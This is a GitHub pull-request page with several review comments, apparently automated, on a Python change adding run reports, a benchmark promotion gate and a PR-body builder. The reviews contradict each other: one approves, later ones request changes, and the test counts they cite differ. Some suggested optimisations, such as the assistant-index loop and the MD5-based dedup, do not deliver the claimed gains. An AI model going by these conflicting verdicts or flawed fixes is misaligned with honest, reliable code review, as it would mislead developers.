feat: add ingestion reports and promotion gates#55
e95b4aa to 1360d7f
Closing this PR in favor of consolidated PR #68. Local integration found real helper-block overlap in evolution/skills/evolve_skill.py across the stack, and #68 preserves local test evidence: targeted stack tests 41 passed; full suite 164 passed; GitHub checks were absent on the split PRs. Review #68 instead.
jarrettj
left a comment
Performance Review Summary
Scope: Reviewed PR #55 for performance issues like N+1 queries, unnecessary loops, and inefficient algorithms. All 139 tests pass.
Verdict: APPROVED with performance observations 💚
The code is production-ready. Found 4 performance considerations that could be optimized for larger-scale deployments, but none are blocking:
Performance Observations
⚠️ O(N²) Nested Loop in Message Pair Extraction
File: evolution/core/external_importers.py, lines 435-453 (HermesSessionImporter)
for i, msg in enumerate(msg_list):  # O(n)
    # ...
    for j in range(i + 1, len(msg_list)):  # O(n) inner loop per message
        if msg_list[j].get("role") == "assistant":
            # found assistant response
            break
Impact: With 100 messages in a session, the inner loop could run close to 5,000 times in the worst case (99 + 98 + ... + 1 = 4,950).
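Suggestion: Pair messages in a single pass by maintaining state as you walk the message list. A more compact form of the current lookup is shown here; note that it still scans forward from each user message, so its worst case remains quadratic:
for i, msg in enumerate(msg_list):
    if msg.get("role") == "user":
        # next() stops at the first assistant message after position i
        assistant_text = next((m.get("content") for m in msg_list[i+1:]
                               if m.get("role") == "assistant"), "")
Or restructure the loop (for example with a deque) for O(n) single-pass processing.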
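A true single pass is possible by walking the list in reverse and carrying the most recent assistant reply along. The sketch below is illustrative only: `pair_user_with_next_assistant` is a hypothetical helper, not code from the PR, and it assumes each user message should be paired with the nearest following assistant message that has non-empty content.

```python
def pair_user_with_next_assistant(msg_list):
    """Pair each user message with the next assistant reply in O(n).

    Hypothetical helper: assumes messages are dicts with "role" and
    "content" keys, and that empty assistant messages are skipped.
    """
    pairs = []
    next_assistant = ""  # content of the nearest assistant message to the right
    for msg in reversed(msg_list):
        role = msg.get("role")
        if role == "assistant":
            content = msg.get("content")
            if content:
                next_assistant = content
        elif role == "user":
            pairs.append((msg.get("content", ""), next_assistant))
    pairs.reverse()  # restore original message order
    return pairs
```

Each message is visited exactly once, so the cost stays linear regardless of how many tool messages sit between a user turn and its reply.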
⚠️ Filesystem Stat Calls for Sorting
File: evolution/core/external_importers.py, lines 415-418 (HermesSessionImporter)
session_files = sorted(
    HermesSessionImporter.SESSION_DIR.glob("*.json"),
    key=lambda p: p.stat().st_mtime,  # <-- stat() called per file
    reverse=True
)
Impact: O(n) filesystem syscalls just to get modification timestamps for sorting. With 100 session files = 100 stat() syscalls at startup.
Suggestion:
- If ordering is critical, store mtime in session JSON alongside messages
- If ordering isn't critical, remove the sort (users typically check recent files anyway)
- Alternative: Use ctime, which may be cached by the OS, or defer sorting to a lazy loading pattern
💡 Full Message Loading During Dry-Run
File: evolution/core/external_importers.py, line 690 (describe_source_availability)
def describe_source_availability(sources: list[str]) -> list[SourceAvailability]:
    # ...
    candidate_count = len(importer_cls.extract_messages())  # Loads ALL messages
Impact: Dry-run operation loads full message history into memory just to count candidates. Unnecessary memory usage for status checks.
Suggestion: Add optional count_only=True parameter to importers:
def extract_messages(limit: int = 0, count_only: bool = False) -> int | list[dict]:
    if count_only:
        return sum(1 for line in file if line.strip())  # Count without loading
💡 Post-Filter Deduplication
File: evolution/core/external_importers.py, lines 746-752 (build_dataset_from_external)
deduped_examples = []
seen_inputs = set()
for ex in examples:
    if ex.task_input in seen_inputs:
        continue
    seen_inputs.add(ex.task_input)
    deduped_examples.append(ex)
Impact: Second pass through examples for deduplication. Minor redundancy.
Suggestion: Integrate deduplication into RelevanceFilter.filter_and_score() to avoid the second pass:
seen_inputs = set()
for msg in candidates:
    if msg["task_input"] in seen_inputs:
        continue
    seen_inputs.add(msg["task_input"])
    # ... scoring logic ...
What Looks Good ✅
- No N+1 queries: No database/API calls in loops
- Error handling: Timeout guards on benchmark subprocess execution (good fail-closed behavior)
- Memory efficiency: Output truncation for large benchmark logs (last 4000 chars)
- Test coverage: 139 tests, all passing
- Safe subprocess handling: Using shlex.split() + capture_output=True, no shell=True
- Schema validation: Required fields checked before processing
Recommendation: Merge as-is. All performance considerations are optimizations for scale, not correctness issues. If users report slow imports with large session histories (100+MB), revisit the O(n²) pairing loop and file stat calls.
jarrettj
left a comment
Performance review complete: approved for merge. See detailed performance observations in separate comment.
jarrettj
left a comment
Performance Review Summary
Verdict: REQUEST CHANGES
Found 1 performance issue that should be optimized before merge. See detailed inline comments below.
⚠️ Critical Finding: O(n²) Nested Loop in HermesSessionImporter
File: evolution/core/external_importers.py, lines 435-453
The code has a nested loop that scans linearly for each user message. For a session with 100 messages (20 user, 80 tool/assistant), this performs ~1,600 dict accesses instead of optimal ~100.
Suggested Fix: Pre-build an index of assistant positions before the outer loop and reference it instead of scanning.
See detailed suggestions in the inline comments.
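As a rough illustration of the index-based fix, the sketch below pre-builds the assistant positions once and then uses binary search to find the first one after each user message. `pair_with_index` is a hypothetical name, not code from the PR, and it assumes only assistant messages with non-empty content are valid replies.

```python
from bisect import bisect_right


def pair_with_index(msg_list):
    """Pair user messages with the next assistant reply via a sorted index.

    Hypothetical helper: assumes dict messages with "role"/"content" keys.
    """
    # Built once; already sorted because enumerate() yields ascending positions.
    assistant_indices = [
        i for i, m in enumerate(msg_list)
        if m.get("role") == "assistant" and m.get("content")
    ]
    pairs = []
    for i, msg in enumerate(msg_list):
        if msg.get("role") != "user":
            continue
        # First assistant position strictly greater than i, found in O(log k).
        k = bisect_right(assistant_indices, i)
        assistant_text = ""
        if k < len(assistant_indices):
            assistant_text = msg_list[assistant_indices[k]]["content"]
        pairs.append((msg.get("content", ""), assistant_text))
    return pairs
```

With n messages and k assistant replies this costs O(n log k) overall, instead of rescanning the index from the start for every user message.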
Performance Code Review - PR #55
Executive Summary
Status: REQUEST CHANGES
Found 1 Performance Issue (O(n²) nested loop) that should be optimized before merge. Rest of code quality is strong.
🔴 Performance Issue: O(n²) Nested Loop
Location:
Problem:
for i, msg in enumerate(msg_list):  # Outer: n iterations
    if msg.get('role') != 'user':
        continue
    # ... validation ...
    for j in range(i + 1, len(msg_list)):  # Inner: O(n) - NESTED!
        if msg_list[j].get('role') == 'assistant':
            content = msg_list[j].get('content', '')
            if content:
                assistant_text = content
                break
Complexity Analysis:
Solution:
# Before the main loop:
assistant_indices = [i for i, msg in enumerate(msg_list) if msg.get('role') == 'assistant']
# Inside outer loop, replace inner loop with:
for i, msg in enumerate(msg_list):
    if msg.get('role') != 'user':
        continue
    # ... validation ...
    # Now O(k) instead of O(n), where k = number of assistants
    assistant_text = ''
    for j in assistant_indices:
        if j > i:
            assistant_text = msg_list[j].get('content', '')
            break
        elif j < i:  # Already passed this position
            continue
This reduces the inner loop from scanning all messages to scanning only assistant positions.
💡 Non-Critical Suggestions
Line 33, run_report.py: Use
from collections import Counter
def _source_counts(dataset: EvalDataset) -> dict[str, int]:
    return dict(Counter(ex.source for ex in dataset.all_examples))
✅ Strengths
Next Steps
Once optimized, this PR is merge-ready. 👍
jarrettj
left a comment
Code Review Summary: Performance Analysis
Verdict: REQUEST CHANGES — Found 1 critical and 2 moderate performance issues that should be addressed before merge.
🔴 Critical Performance Issues
1. Expensive File I/O in Dry-Run Mode (external_importers.py:690)
The describe_source_availability() function calls extract_messages() for each source to count candidates:
candidate_count = len(importer_cls.extract_messages())
Each extract_messages() call:
- Reads JSON/JSONL files from disk
- Parses every entry
- Filters by secret patterns
- Returns full message objects
This is called during --dry-run (line 854), which should be lightweight and just report what's available without extracting all data.
Impact: For a user with large Claude Code/Copilot histories, a dry-run could take seconds unnecessarily, blocking feedback loops.
Suggestion: Create a lightweight count_candidates() method (or flag on extract_messages(limit=1)) that only counts without parsing full messages, or at minimum cache the results within a single run.
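A lightweight counter along these lines might look like the sketch below. It is an assumption-laden illustration: `count_candidates` is a hypothetical function, the source is assumed to be a JSONL file with one entry per line, and the result is only an upper bound because no JSON parsing or secret filtering is applied.

```python
from pathlib import Path


def count_candidates(history_path: Path) -> int:
    """Return an approximate candidate count without parsing any JSON.

    Hypothetical helper: counts non-empty lines, so entries that would
    later be filtered out (for example by secret patterns) are included.
    """
    if not history_path.exists():
        return 0
    # Stream the file line by line so memory use stays constant.
    with history_path.open("r", encoding="utf-8", errors="replace") as fh:
        return sum(1 for line in fh if line.strip())
```

A dry-run report built on this would need to label the number as approximate, since the real extraction may keep fewer entries.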
⚠️ Moderate Performance Issues
2. String-Based Deduplication (external_importers.py:746-753)
seen_inputs = set()
for ex in examples:
    if ex.task_input in seen_inputs:
        continue
    seen_inputs.add(ex.task_input)
Set membership checks on large strings (potentially kilobytes) require hashing and comparison. For datasets with thousands of examples, this could add measurable overhead.
Suggestion: Consider hashing task inputs before deduplication:
import hashlib
seen_hashes = set()
seen_inputs = {}  # digest -> first example seen with that input
for ex in examples:
    h = hashlib.md5(ex.task_input.encode()).hexdigest()
    if h not in seen_hashes:
        seen_hashes.add(h)
        seen_inputs[h] = ex
Or use dict-based approach which is more efficient for large texts.
3. Double Iteration for Source Counting (external_importers.py:746-787)
After deduplicating examples, the code iterates again just to count by source:
# First iteration (lines 748-753): deduplication
deduped_examples = []
seen_inputs = set()
for ex in examples:  # ← iteration 1
    ...
# Second iteration (lines 783-787): counting
for ex in examples:  # ← iteration 2
    source_counts[ex.source] = source_counts.get(ex.source, 0) + 1
Impact: O(n) extra pass through potentially large example list.
Suggestion: Combine into single loop:
deduped_examples = []
seen_inputs = set()
source_counts = {}
for ex in examples:
    if ex.task_input not in seen_inputs:
        seen_inputs.add(ex.task_input)
        deduped_examples.append(ex)
        source_counts[ex.source] = source_counts.get(ex.source, 0) + 1
examples = deduped_examples
💡 Minor Suggestions
4. Source Counting Pattern (run_report.py:33)
The _source_counts() function uses dict.get() pattern:
counts[ex.source] = counts.get(ex.source, 0) + 1
While correct, using collections.Counter would be more readable and Pythonic:
from collections import Counter
def _source_counts(dataset: EvalDataset) -> dict[str, int]:
    return dict(Counter(ex.source for ex in dataset.all_examples))
✅ Looks Good
- Security: Excellent use of shlex.split() for safe command parsing in benchmark_gate.py
- Timeouts: Proper timeout handling for benchmark commands (300s default, configurable)
- Fail-closed design: Missing fields and errors result in gate failure, not silent pass
- Test coverage: Good test coverage of the gate logic, importers, and edge cases
- Isolation: No remote mutations without explicit flags (--push, --open-pr)
Recommendation: Address the critical dry-run file I/O issue before merge. The moderate issues can be fixed in a follow-up optimization PR. Tests all pass (11/11), and the feature design is solid.
jarrettj
left a comment
PR Review: feat: add ingestion reports and promotion gates
Verdict: REQUEST_CHANGES — the PR is a well-structured, conservative promotion slice but has a handful of linter issues (unused imports, spurious f-strings) in production code that should be cleaned up before merge. All 150 tests pass. No security or correctness blockers.
Summary
This PR adds three new modules and extends two existing ones to implement auditable promotion machinery:
- run_report.py: writes a machine-readable JSON run report + sidecar unified diff on each evolution run
- benchmark_gate.py: fail-closed CLI gate that evaluates a run report against configurable thresholds
- pr_builder.py: local-first PR body generator from a run report (no side effects unless --push/--open-pr are passed)
- external_importers.py refactored: adds canonical source metadata, explicit dry-run source availability reporting, and input validation helpers
- dataset_builder.py extended: EvalExample gains optional source provenance fields; from_dict is backward-compatible
1. Correctness ✅
- _get() in benchmark_gate.py: dotted-key traversal is correct; stops cleanly on missing keys and raises KeyError so the caller can convert it to a readable failure message.
- artifact_growth denominator uses max(1.0, baseline_size): protects against zero-size baseline. Good.
- cost_increase denominator uses max(0.000001, baseline_cost): asymmetric with the artifact growth guard (which uses 1.0). This means a cost baseline of 0.0000005 would inflate the ratio to ~2000x even with a tiny actual increase. Consider using the same max(1.0, baseline_cost) sentinel or at minimum documenting why the epsilon differs.
- _parse_copilot_events: the "save previous pair" logic correctly flushes the last user→assistant pair after the loop ends. No missed-last-message bug.
- HermesSessionImporter.extract_messages: early return inside the inner loop (return messages) works but breaks the outer for session_file in session_files loop entirely. This is correct behaviour (the limit is honoured) but is subtly inconsistent with the Copilot importer, which uses break + slice at the caller level. A comment would help.
- write_run_report: report_dir.mkdir(parents=True, exist_ok=True) correctly handles first-run directory creation.
- build_pr_text: accesses report.get("target", {}) safely, but then calls target.get("name", "unknown-target") without null-guarding target itself. If target is explicitly set to null in the JSON, report.get("target", {}) returns None, and .get() on None will raise AttributeError. A defensive or {} pattern (report.get("target") or {}) would fix this.
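The null-target case from the last bullet can be reproduced in a few lines. This is a minimal sketch, not the PR's code: `target_name` is a hypothetical helper that isolates the lookup, and the default string is taken from the review text above.

```python
import json


def target_name(report: dict) -> str:
    """Look up the target name while tolerating "target": null in the JSON."""
    # `or {}` covers both a missing key and an explicit null value,
    # whereas report.get("target", {}) only covers the missing key.
    target = report.get("target") or {}
    return target.get("name", "unknown-target")


# An explicit null survives dict.get's default and comes back as None.
null_report = json.loads('{"target": null}')
assert null_report.get("target", {}) is None
```

The same pattern applies to any nested section of the report that a writer might serialise as null rather than omit.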
2. Security ✅
- SECRET_PATTERNS regex is intentionally anchored to known key formats to minimise false positives. That's the right trade-off for a pre-filter (the downstream LLM scoring provides a second filter).
- shlex.split() in benchmark_gate.py correctly splits benchmark commands before passing them to subprocess.run() as a list, so there is no shell=True injection risk.
- subprocess.run uses capture_output=True and no shell=True: correct.
- The gho_* GitHub token that will appear in run transcripts is NOT covered by SECRET_PATTERNS. The pattern ghp_\S+ covers GitHub personal access tokens (classic) and ghu_\S+ covers user tokens, but gho_\S+ (OAuth access tokens) is missing. This is a warning rather than a critical issue because session history is unlikely to contain raw OAuth tokens, but the gap is worth closing.
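To show what closing the gap might look like, here is a small sketch. The real SECRET_PATTERNS list is not reproduced in this review, so `TOKEN_PATTERNS` and `contains_github_token` are hypothetical names that cover only the three prefixes discussed above.

```python
import re

# Hypothetical subset of patterns; the PR's actual SECRET_PATTERNS may differ.
TOKEN_PATTERNS = [
    r"ghp_\S+",  # personal access tokens (classic)
    r"ghu_\S+",  # user tokens
    r"gho_\S+",  # OAuth access tokens (the missing prefix)
]
_TOKEN_RE = re.compile("|".join(TOKEN_PATTERNS))


def contains_github_token(text: str) -> bool:
    """Return True if the text contains any of the token prefixes above."""
    return _TOKEN_RE.search(text) is not None
```

Because each pattern requires the trailing underscore, ordinary words such as "ghost" do not trigger the filter.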
3. Code Quality ⚠️
Warning — ruff reports 10 fixable issues:
In evolution/core/benchmark_gate.py:
- import sys: unused import (line 8)
In evolution/skills/evolve_skill.py:
- from rich.panel import Panel: unused import (line 18)
- get_hermes_agent_path: unused import (line 21)
- LLMJudge, FitnessScore: unused imports (line 24)
- Five f-strings without placeholders on lines 78, 81, 124, 139, 192 (spurious f prefix)
These are all auto-fixable (ruff check --fix) and should be resolved before merge to keep the linter clean.
Suggestions (non-blocking):
- benchmark_gate.py line 75: the loop variable field_name shadows the field imported from dataclasses on the same import line (line 9). The shadowing is benign (the loop variable is a string, not the dataclass helper), but renaming the loop variable to required_field would eliminate the confusion.
- _parse_scoring_json brace-counting parser is a nice hand-rolled solution. Consider a one-line comment explaining why re.search(r'\{.*\}', …, re.DOTALL) was not used (it breaks on nested braces). The comment is already in the code but refers to it only indirectly.
- pr_builder.py line 59: the test plan hardcodes python -m pytest tests/ -q but the repository uses pytest directly (per pyproject.toml). Minor, but consistent tooling references are helpful for reviewers who copy-paste from PR bodies.
4. Testing ✅
- 11 new tests cover all three new modules and the importer changes: run_report, benchmark_gate (required fields, pass/fail thresholds, CLI exit codes, benchmark command failure, timeout), pr_builder (dry-run, determinism, no git mutation), and external_importers (metadata roundtrip, dry-run output, source availability distinction).
- Tests correctly use tmp_path, monkeypatch, CliRunner, and patch.object, so there are no real filesystem side effects.
- The timeout test uses --benchmark-timeout-seconds 1 with time.sleep(5): reliable signal.
- Missing edge case: build_pr_text is not tested when report.get("target") returns None (the null-JSON case noted in Correctness above). A one-line test would close this gap.
- Missing edge case: _parse_scoring_json has no test for the brace-counting slow path; only the fast json.loads path is implicitly exercised. Low priority but worth noting.
5. Performance ✅
- describe_source_availability calls importer_cls.extract_messages() with no limit. For large session stores this could be slow during dry-run. The ClaudeCodeImporter.extract_messages(limit=0) already supports a limit parameter; passing a small limit (e.g. 1000) for the availability probe would keep dry-run fast.
- HermesSessionImporter reads entire session JSON files into memory (json.loads(session_file.read_text())). For very large sessions this could be expensive; streaming is not straightforward with JSON objects but the risk is low in practice.
- No N+1 or blocking I/O issues in the hot path.
6. Documentation ✅
- All three new modules have module-level docstrings. Public functions have docstrings with Args/Returns sections.
- CHANGELOG/HISTORY file: not present in this repo, so no stale entry concern.
- The PR description is thorough and directly references the issue (#54).
Required fixes before merge
- Remove the 10 unused imports and spurious f-strings flagged by ruff (ruff check --fix handles all of them automatically).
- Consider adding gho_\S+ to SECRET_PATTERNS in external_importers.py to cover GitHub OAuth app tokens.
Optional improvements
- Guard build_pr_text against target being JSON null.
- Add a small limit to describe_source_availability's extract_messages() call for faster dry-runs.
- Rename the field_name loop variable in benchmark_gate.py to avoid shadowing the field import.
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Auth: gh CLI (jarrettj) · Checkout: fix/54-ingestion-promotion-gates · Suite: 150 passed, 11 warnings (DSPy deprecation only)
⚠️ Warning 1 — describe_source_availability() runs a full extraction for a dry-run count
File: evolution/core/external_importers.py, line 437
candidate_count = len(importer_cls.extract_messages())
extract_messages() reads and parses all messages in the source (potentially thousands of Claude Code history entries or Hermes sessions) just to return a count for a dry-run display. Dry-run should be cheap. The path-existence check is already done on the line above; the extraction call contradicts the dry-run spirit and will be slow on large history files.
Suggested fix: Pass limit=1 to confirm the source is non-empty, then report candidate_count as approximate — or add a lightweight count_messages() class method that doesn't build the full list.
⚠️ Warning 2 — Deduplication silently drops cross-source examples with identical task_input
File: evolution/core/external_importers.py, lines 471–477
for ex in examples:
    if ex.task_input in seen_inputs:
        continue  # ← hermes example silently dropped if claude-code had same text
    seen_inputs.add(ex.task_input)
    deduped_examples.append(ex)
If two importers surface the same common question (e.g., "how do I rebase?"), the second-seen example is dropped without logging. This silently biases the training set toward whichever source appears first in the sources list. The PR adds source provenance metadata specifically to make ingestion auditable, and the dedup step works against that goal by losing provenance without a trace.
Suggested fixes:
- Log how many examples were dropped: console.print(f" Deduped {n_dropped} examples with duplicate task_input").
- Consider keying the dedup on (task_input, source) instead of task_input alone, or at least log the dropped count.
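One way to keep the dedup auditable is to return the dropped counts alongside the kept examples. The following is a sketch under stated assumptions: `Example` is a hypothetical stand-in for EvalExample with only the two fields needed here, and `dedupe_with_audit` is not a function from the PR.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass
class Example:
    """Hypothetical stand-in for EvalExample (only the fields used here)."""
    task_input: str
    source: str


def dedupe_with_audit(examples):
    """Drop repeated task_input values and report drops per source."""
    seen = set()
    kept = []
    dropped_by_source = Counter()
    for ex in examples:
        if ex.task_input in seen:
            # Record which source lost an example instead of dropping silently.
            dropped_by_source[ex.source] += 1
            continue
        seen.add(ex.task_input)
        kept.append(ex)
    return kept, dropped_by_source
```

The caller can then log `sum(dropped_by_source.values())` and the per-source breakdown, which makes any bias toward the first-listed source visible in the run output.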
⚠️ Warning 3 — GateResult.warnings is declared but never populated
File: evolution/core/benchmark_gate.py, lines 59, 153
warnings: list[str] = []
# ... no warnings.append() anywhere in evaluate_report()
return GateResult(not failures, failures, warnings, thresholds, observed)
The warnings field is wired through the dataclass and surfaced in the JSON output, but no code path in evaluate_report ever appends to it. Consumers of the report who check gate.warnings will always see [], making the field dead infrastructure. This is confusing in a security gate context where "passed but with warnings" is a meaningful state (e.g., cost increase approaching but not exceeding the threshold).
Suggested fix: Either add at least one warning-level check (e.g., artifact growth above 80% of the threshold, or cost increase above 80%), or remove the field from the dataclass and the JSON schema until it has a concrete use.
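A warning-level check of the kind suggested could be sketched as follows. The function name `check_threshold` and the `warn_fraction` parameter are illustrative assumptions, not part of benchmark_gate.py, and the sketch assumes a positive limit where larger observed values are worse.

```python
def check_threshold(name, observed, limit, warn_fraction=0.8):
    """Classify an observed metric as pass, warning, or failure.

    Hypothetical helper: returns (failures, warnings) as lists of messages.
    """
    failures, warnings = [], []
    if observed > limit:
        failures.append(f"{name} {observed:.3f} exceeds limit {limit:.3f}")
    elif observed > warn_fraction * limit:
        # Passed, but close enough to the limit to be worth surfacing.
        warnings.append(
            f"{name} {observed:.3f} is above {warn_fraction:.0%} of limit {limit:.3f}"
        )
    return failures, warnings
```

Extending the gate's existing failure and warning lists with these results would give the warnings field a concrete meaning without changing the pass/fail outcome.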
💡 Suggestion 1 — build_pr_text() should catch malformed report JSON gracefully
File: evolution/core/pr_builder.py, line 529
report = json.loads(Path(report_path).read_text())  # raw JSONDecodeError on bad input
A corrupted or truncated report file (e.g., an incomplete write from run_report.py) will produce a raw json.JSONDecodeError traceback. Wrapping in try/except json.JSONDecodeError as e: raise click.ClickException(f"Could not parse report: {e}") gives a friendlier CLI error.
💡 Suggestion 2: Cost gate epsilon makes the ratio misleading when the baseline cost is zero
File: evolution/core/benchmark_gate.py, line 115
cost_increase = (optimized_cost - baseline_cost) / max(0.000001, baseline_cost)
If baseline_cost is 0.0 (a free baseline run), the epsilon floor causes the ratio to be astronomically large even for tiny optimized costs (e.g., $0.001 optimized → 1000× increase, which fails any sane max_cost_increase threshold). Consider explicitly skipping the ratio check when baseline_cost == 0.0 and logging a warning instead.
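The zero-baseline skip might be expressed like this. It is a sketch only: `cost_increase_ratio` is a hypothetical helper, and returning None to signal "ratio undefined" is an assumed convention that the caller would turn into a warning.

```python
from typing import Optional


def cost_increase_ratio(baseline_cost: float, optimized_cost: float) -> Optional[float]:
    """Relative cost increase, or None when the baseline is free.

    Hypothetical helper: a None result means the ratio check should be
    skipped and a warning logged instead.
    """
    if baseline_cost <= 0.0:
        return None
    # Keep the original epsilon floor for very small positive baselines.
    return (optimized_cost - baseline_cost) / max(0.000001, baseline_cost)
```

Separating "undefined" from "very large" lets the gate decide explicitly how to treat a free baseline, rather than failing on an artefact of the epsilon.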
💡 Suggestion 3 — Timeout test adds wall-clock latency to CI; consider mocking
File: tests/core/test_issue54_promotion.py, lines 1109–1132
The test spawns python -c 'import time; time.sleep(5)' with a 1-second timeout, which is correct for correctness but adds ~1–2 seconds of real wall-clock time to every CI run. Marking it @pytest.mark.slow or replacing the subprocess with unittest.mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("cmd", 1)) would keep the coverage without the delay.
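The mocked variant could look roughly like the sketch below. `run_benchmark` is a hypothetical stand-in for the gate's benchmark runner (its real name and return shape are not shown in this review); only `subprocess.run`, `subprocess.TimeoutExpired`, and `unittest.mock.patch` are real APIs.

```python
import subprocess
from unittest.mock import patch


def run_benchmark(cmd: list, timeout: float) -> dict:
    """Hypothetical fail-closed runner: a timeout counts as a failure."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"passed": False, "reason": "timeout"}
    return {"passed": proc.returncode == 0, "reason": "exit code"}


def test_timeout_is_fail_closed():
    # No real process is spawned, so the test adds no wall-clock delay.
    with patch("subprocess.run", side_effect=subprocess.TimeoutExpired("cmd", 1)):
        result = run_benchmark(["python", "-c", "pass"], timeout=1)
    assert result == {"passed": False, "reason": "timeout"}
```

Keeping one real-subprocess test behind a slow marker would still exercise the actual timeout plumbing while the mocked test runs on every CI pass.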
💡 Suggestion 4 — Add explicit encoding="utf-8" to run_report.py text operations
File: evolution/core/run_report.py, lines 675, 682, 683, 738
read_text() and write_text() without an explicit encoding default to the system locale, which can vary across developer machines and CI environments. Adding encoding="utf-8" makes the report files locale-independent.
✅ Looks Good
- No shell=True anywhere: benchmark commands are parsed with shlex.split() and passed as an argv list. Shell injection vector correctly closed, as documented in the PR description.
- Fail-closed design throughout: missing required fields, unreadable report files, failed or timed-out benchmark commands all produce GateResult(passed=False). Exactly right for a promotion gate.
- --dry-run remains non-mutative: write_report, run_benchmark_gate, and prepare_pr are separate opt-in flags with no state mutation on the dry-run path.
- Backward compatibility preserved: EvalExample.from_dict filters by __dataclass_fields__, so existing JSONL files without the new metadata fields load cleanly.
- elapsed is correctly in scope: defined at evolve_skill.py:183, well before the write_report block at line 307; no scoping bug.
- Test coverage is solid: 11 targeted tests covering fail-closed gate, timeout, CLI exit codes, dry-run non-mutation, and metadata roundtrip. All 150 suite tests pass locally.
- Secret filtering unchanged and active: _contains_secret() checks remain in all ingestion paths before any EvalExample is created; no regression introduced.
- _run_git uses check=True: git failures in pr_builder.py raise immediately; no silent pass-on-error.
Verdict
REQUEST_CHANGES — Warnings 1–3 should be addressed before merge. Warning 2 (silent cross-source dedup) is the most impactful because it works against the explicit audit-trail goal of this PR. Warning 3 (dead warnings field) risks misleading operators who look at the gate JSON output. Warning 1 (expensive dry-run extraction) is a UX correctness issue. The four suggestions are optional improvements.
jarrettj
left a comment
Code Review — feat: add ingestion reports and promotion gates
PR: #55 | Author: @steezkelly | Branch: fix/54-ingestion-promotion-gates
Verdict: REQUEST_CHANGES — two correctness issues and one test gap require attention before merge.
Summary
This PR ships a solid, well-scoped auditable promotion slice. The three new modules (benchmark_gate.py, run_report.py, pr_builder.py) are clean, the fail-closed gate design is correct, deduplication in build_dataset_from_external is a good addition, and describe_source_availability is a meaningful improvement over the previous dry-run behaviour. The test coverage is thorough and well-structured.
The issues below are mostly contained, but two of them could cause silent data loss or incorrect gate results in production.
🔴 Critical
1. _importer_registry() captures HISTORY_PATH/SESSION_DIR at call time, breaking monkeypatching in describe_source_availability
_importer_registry() builds its tuple with the current value of ClaudeCodeImporter.HISTORY_PATH etc. at the moment it is called. describe_source_availability calls _importer_registry() to get both the importer_cls and the canonical path, then does if not path.exists() with that snapshot. If a test patches ClaudeCodeImporter.HISTORY_PATH after the registry is built, the path check uses the stale pre-patch value but the extract_messages() call uses the class attribute (which is patched). This is why test_source_availability_distinguishes_missing_path_from_empty_available_source passes — it patches before calling describe_source_availability — but any test that patches between the registry call and the path check would see divergent behaviour.
More importantly, in production the registry is built once per describe_source_availability call, so there is no real stale-snapshot problem at runtime. However, the function is conceptually broken for callers that want to test non-default paths: path in the status always reflects the class-level default, never a dynamically redirected path. The returned SourceAvailability.path field will show the default system path even when extraction succeeded against a different path. The test that asserts str(history) in result.output only passes because the test patches the class attribute, which also changes HISTORY_PATH for the registry lookup.
Fix: Have describe_source_availability access importer_cls.HISTORY_PATH (or SESSION_DIR) after the patch is applied, rather than reading it from the registry tuple. One clean approach:
_PATH_ATTR = {
    "claude-code": "HISTORY_PATH",
    "copilot": "SESSION_DIR",
    "hermes": "SESSION_DIR",
}
def describe_source_availability(sources):
    importers = _importer_registry()
    for source in sources:
        _, importer_cls, _ = importers[source]
        path = getattr(importer_cls, _PATH_ATTR[source])
        ...
2. Silent metadata loss when filter_and_score result is re-deduplicated after the count log line
In build_dataset_from_external, the deduplication block runs after filter_and_score returns and before the "Found N relevant examples" log, which is fine. But the count logged in that line is the deduplicated count. However, the min_dataset_size check and the subsequent split are also computed on the deduplicated list, so the split sizes will be correct.
The real issue: deduplication is on task_input only (exact string match). Two examples from different sessions that differ only in session_id or project but have identical task_input will be collapsed, silently discarding the second one including its metadata. This could silently drop genuine duplicates from different real sessions. While the intent is to avoid feeding the same prompt to the optimiser twice, the current implementation throws away the second record's metadata rather than, for example, keeping the one with the richer metadata (non-empty session_id, repo, etc.).
Fix (minimal): Document the behaviour explicitly in a comment. Fix (preferred): Keep the record that has richer metadata when deduplicating, or deduplicate on (task_input, session_id) to preserve cross-session diversity.
⚠️ Warning
3. benchmark_gate.py imports sys but never uses it
import sys on line 8 of benchmark_gate.py is unused. ruff flags this as F401. Since the main function uses raise SystemExit(1) (which is correct — no sys needed), remove the import.
# Remove line 8:
import sys
4. _constraint_to_dict fallback dict(result) will raise TypeError at runtime for non-dataclass ConstraintResult objects
In run_report.py, _constraint_to_dict tries asdict(result) for dataclasses and falls back to dict(result). dict() on an arbitrary object only works if it is a mapping or an iterable of key-value pairs. A plain ConstraintResult object that is not a dataclass (no __dataclass_fields__) and is not a mapping will raise TypeError: 'ConstraintResult' object is not iterable. The test only exercises the dataclass path. If ConstraintResult is ever replaced with a named tuple or another type that lacks __dataclass_fields__, the fallback will raise, and the exception will either be swallowed by a surrounding try/except in callers or crash the report write.
Fix: Add elif hasattr(result, '_asdict'): return result._asdict() for namedtuple support, and document the contract.
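A conversion helper with an explicit contract might be sketched as below. `constraint_to_dict` here is an illustrative rewrite, not the PR's `_constraint_to_dict`; it assumes results are dataclass instances, named tuples, or mappings and rejects anything else loudly.

```python
from collections.abc import Mapping
from dataclasses import asdict, is_dataclass


def constraint_to_dict(result) -> dict:
    """Convert a constraint result to a plain dict.

    Illustrative contract: accepts dataclass instances, named tuples
    (anything exposing _asdict), and mappings; raises TypeError otherwise.
    """
    # is_dataclass() is also True for dataclass *classes*, so exclude types.
    if is_dataclass(result) and not isinstance(result, type):
        return asdict(result)
    if hasattr(result, "_asdict"):
        return dict(result._asdict())
    if isinstance(result, Mapping):
        return dict(result)
    raise TypeError(f"Unsupported constraint result type: {type(result).__name__}")
```

Raising a descriptive TypeError at the boundary keeps the failure visible at report-writing time instead of surfacing as an opaque error from dict().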
5. pr_builder.py embeds the absolute report_path in the test plan section of the PR body
Line 59 of pr_builder.py:
f"- python -m evolution.core.benchmark_gate --report {report_path}",
report_path here is the local filesystem path passed to build_pr_text. When this PR body is posted to GitHub, reviewers will see a machine-specific local path (e.g. /Users/alice/output/demo/20260516T120000Z-demo.json). This is confusing and the path will not exist on a reviewer's machine.
Fix: Use Path(report_path).name (filename only) or a relative path, and add a note that the full path is in the run report JSON.
💡 Suggestion
6. describe_source_availability is an O(N messages) call inside what should be a cheap dry-run
